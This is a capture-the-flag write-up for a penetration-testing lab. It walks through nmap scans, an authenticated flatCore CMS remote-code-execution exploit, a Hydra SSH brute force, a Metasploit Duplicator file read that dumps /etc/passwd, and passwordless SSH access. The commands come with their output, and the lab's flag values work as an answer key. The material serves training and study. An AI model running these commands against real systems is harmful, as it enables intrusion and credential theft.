Host & Network Penetration Testing: Exploitation CTF 1 Walkthrough
This walkthrough covers a comprehensive penetration testing exercise involving two targets, demonstrating various exploitation techniques commonly encountered in real-world scenarios and EJPT certification preparation.
Overview
Targets:
target1.ine.local(192.90.71.3)target2.ine.local(192.90.71.4)
Objectives:
- Exploit vulnerable web applications
- Compromise system users
- Retrieve 4 flags total
Target 1: Flatcore CMS Exploitation
Reconnaissance
We’ll start with nmap to discover what services are running on our target. This helps us understand the attack surface and identify potential entry points.
Starting with our standard nmap reconnaissance to identify open ports and services:
1
nmap -sC -sV target1.ine.local
Nmap Results:
1
2
3
4
5
6
7
8
9
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-06 11:18 IST
Nmap scan report for target1.ine.local (192.173.76.3)
Host is up (0.000034s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: flatCore
|_http-title: Homepage
Key Findings:
- Port 80 (HTTP) - Apache 2.4.41 running flatCore CMS
- Port 22 (SSH) - OpenSSH 8.2p1 Ubuntu
- HTTP generator confirms flatCore CMS
- Credentials provided:
admin:password1
Flag 1: Web Application Exploitation
Step 1: Web Application Analysis
With port 80 open and the nmap scan showing this is a flatCore CMS, let’s examine the web application. We’ll navigate to the site and use the provided credentials to gain access to the admin panel.
Navigating to http://target1.ine.local reveals a website running Flatcore CMS with a login interface. The nmap scan already told us this was flatCore, and we have credentials provided in the lab environment.
Step 2: Exploit Research
Now that we’ve identified flatCore CMS, let’s check if there are any known vulnerabilities we can exploit. We’ll use searchsploit to query the local exploit database.
Using searchsploit to find known vulnerabilities:
1
searchsploit flatcore
Results:
1
2
3
4
Exploit Title | Path
----------------------------------------------------------------- | ---------------------------------
FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)| php/webapps/50262.py
FlatCore CMS 2.1.1 - Stored Cross-Site Scripting (XSS) | php/webapps/51068.txt
The Remote Code Execution (Authenticated) exploit is perfect for our scenario since we have valid credentials.
Step 3: Exploit Execution
Perfect! We found an authenticated RCE exploit for FlatCore CMS. Since we have valid credentials, this is exactly what we need. Let’s copy the exploit to our directory and execute it.
Copy the exploit to our working directory:
1
searchsploit -m 50262
Execute the exploit with provided credentials:
1
python3 50262.py http://target1.ine.local/ admin password1
Step 4: Flag Retrieval
Great! The exploit worked and we now have command execution on the target. Let’s navigate the file system to find our first flag, which should be in the root directory.
Once we have code execution, navigate to the root directory:
1
2
ls /
cat /flag1.txt
🚩 Flag 1: e0199768ac394d67a9307c9b9d515ae0
Flag 2: User Compromise via SSH Brute Force
Step 1: User Enumeration
Now let’s look for other ways to access this system. We’ll enumerate users to see if there are any accounts we can target. Let’s check the /home directory to see what users exist on the system.
Enumerate users on the system:
1
ls -l /home
Discovery: User iamaweakuser exists - suggesting a weak password.
Step 2: Password Brute Force
Interesting! We found a user called iamaweakuser - that name suggests they might have a weak password. Since SSH is running on port 22 (from our nmap scan), let’s try to brute force this user’s password using Hydra with a common password wordlist.
Since SSH is open, attempt brute force attack using Hydra:
1
hydra -l iamaweakuser -P "/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt" 192.90.71.3 -t 4 ssh
Result:
1
[22][ssh] host: 192.90.71.3 login: iamaweakuser password: angel
Step 3: SSH Access and Flag Retrieval
Excellent! Hydra found the password is “angel”. Now we can use these credentials to SSH into the target and access the user’s account.
Connect via SSH:
1
ssh iamaweakuser@192.90.71.3
Retrieve the flag:
1
2
ls
cat flag2.txt
🚩 Flag 2: FLAG2{340d4657e8e14797aca992d13c6d2207}
Target 2: WordPress Plugin Exploitation
Reconnaissance
Let’s move on to our second target. We’ll use a more comprehensive nmap scan this time, including vulnerability scripts to automatically detect potential security issues.
Comprehensive nmap scan with vulnerability scripts:
1
nmap -sS -sV --script=vuln target2.ine.local
Key Findings:
1
2
3
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
WordPress enumeration reveals:
- WordPress version 6.1
- Admin user discovered
- Plugins: Akismet 5.0.1, Duplicator 1.3.26
WordPress Plugin Enumeration
Great! We can see this is a WordPress site. Since WordPress sites often have vulnerabilities in their plugins rather than the core application, let’s specifically enumerate the installed plugins and their versions.
Enhanced WordPress enumeration:
1
nmap -sV --script http-wordpress-enum 192.90.71.4
Results:
1
2
3
plugins
akismet 5.0.1
duplicator 1.3.26
Flag 3: Duplicator Plugin Exploitation
Step 1: Vulnerability Research
Perfect! We found two plugins: Akismet and Duplicator. Let’s focus on the Duplicator plugin version 1.3.26 since plugin vulnerabilities are common attack vectors. We’ll search for known exploits for this specific version.
Search for Duplicator plugin vulnerabilities:
1
searchsploit duplicator
Notable Results:
1
2
Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read | php/webapps/50420.py
Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read (Metasp | php/webapps/49288.rb
Step 2: Metasploit Exploitation
Excellent! We found multiple exploits for Duplicator 1.3.26, including an “Unauthenticated Arbitrary File Read” vulnerability that has a Metasploit module. This is perfect since we don’t need authentication. Let’s use Metasploit to exploit this vulnerability.
Launch Metasploit and use the Duplicator file read module:
1
2
3
msfconsole
search duplicator
use auxiliary/scanner/http/wp_duplicator_file_read
Configure the module:
1
2
set rhosts 192.90.71.4
show options
Module Configuration:
1
2
3
4
5
6
7
Name Current Setting Required Description
---- --------------- -------- -----------
DEPTH 5 yes Traversal Depth (to reach the root folder)
FILEPATH /etc/passwd yes The path to the file to read
RHOSTS 192.90.71.4 yes The target host(s)
RPORT 80 yes The target port (TCP)
TARGETURI / yes The base path to the wordpress application
Step 3: File System Enumeration
Now that we have arbitrary file read capability, let’s start by reading the /etc/passwd file to enumerate all users on the system. This will help us understand potential targets and may reveal interesting usernames.
First, read /etc/passwd to enumerate users:
1
run
Results:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
mysql:x:104:105:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:105:106::/nonexistent:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
iamacrazyfreeuser:x:1000:1000:,,,:/home/iamacrazyfreeuser:/bin/bash
Critical Discovery: User iamacrazyfreeuser found with UID 1000 and bash shell access.
Step 4: Flag Retrieval
Perfect! We can read any file on the system. Now let’s use this capability to directly read the third flag, which should be located at /flag3.txt based on the CTF pattern.
Change the FILEPATH to target flag3:
1
2
set FILEPATH /flag3.txt
run
🚩 Flag 3: FLAG3{35744c36bdce49d98a33192971990253}
Flag 4: Passwordless User Access
Step 1: User Discovery Analysis
Looking at the /etc/passwd file we read earlier, there’s an interesting user called iamacrazyfreeuser with UID 1000 and a bash shell. The username is quite suggestive - let’s see if this user has been configured with some kind of special access.
From the /etc/passwd enumeration, we discovered user iamacrazyfreeuser with:
- UID: 1000 (primary user)
- Shell:
/bin/bash(interactive shell access) - Home directory:
/home/iamacrazyfreeuser
Step 2: SSH Access Attempt
The username iamacrazyfreeuser really stands out - it sounds like this account might be configured for easy access. Let’s try connecting via SSH without a password and see what happens.
Based on the username suggesting “free” access, attempt SSH connection:
1
ssh iamacrazyfreeuser@192.90.71.4
Success! No password required - direct access granted.
Step 3: Final Flag Retrieval
Amazing! We got in without any password - that’s definitely a serious misconfiguration. Now let’s check the user’s home directory for our final flag.
1
2
ls
cat flag4.txt
🚩 Flag 4: FLAG4{579d6d66033d4de0aa66b0fb3ab3f619}
Summary
This CTF demonstrated several critical security concepts and attack methodologies commonly encountered in real-world penetration testing:
Vulnerabilities Exploited:
- Authenticated RCE in Flatcore CMS - Demonstrates the importance of keeping CMS platforms updated and the risks of default/weak authentication
- Weak Password Policy - Shows how predictable passwords can be exploited through brute force attacks
- Unauthenticated File Read in WordPress Plugin - Highlights the risks of third-party plugins and the importance of plugin security auditing
- Misconfigured SSH Access - Illustrates how improper SSH configuration can lead to unauthorized access
Tools Used and Their Purpose:
- Nmap - Service enumeration and vulnerability scanning to map the attack surface
- Searchsploit - Exploit database searching to find known vulnerabilities quickly
- Hydra - Password brute-forcing to exploit weak authentication
- Metasploit - Exploitation framework providing reliable, tested exploit modules
- Custom Python Exploits - Manual exploitation techniques for specific vulnerabilities
Key Security Lessons:
This exercise shows how multiple vulnerabilities can be chained together to compromise systems. We saw authenticated web application exploits, weak password policies, plugin vulnerabilities, and configuration issues all providing different attack paths.
The progression from initial reconnaissance through exploitation to post-exploitation demonstrates real-world penetration testing methodology. Each target required different approaches - from authenticated CMS exploitation to unauthenticated plugin vulnerabilities.
Most importantly, this CTF highlights that security is only as strong as the weakest link. Even with some security controls in place, misconfigurations like passwordless SSH access can completely undermine the security posture.
Captured Flags:
- Flag 1:
e0199768ac394d67a9307c9b9d515ae0 - Flag 2:
FLAG2{340d4657e8e14797aca992d13c6d2207} - Flag 3:
FLAG3{35744c36bdce49d98a33192971990253} - Flag 4:
FLAG4{579d6d66033d4de0aa66b0fb3ab3f619}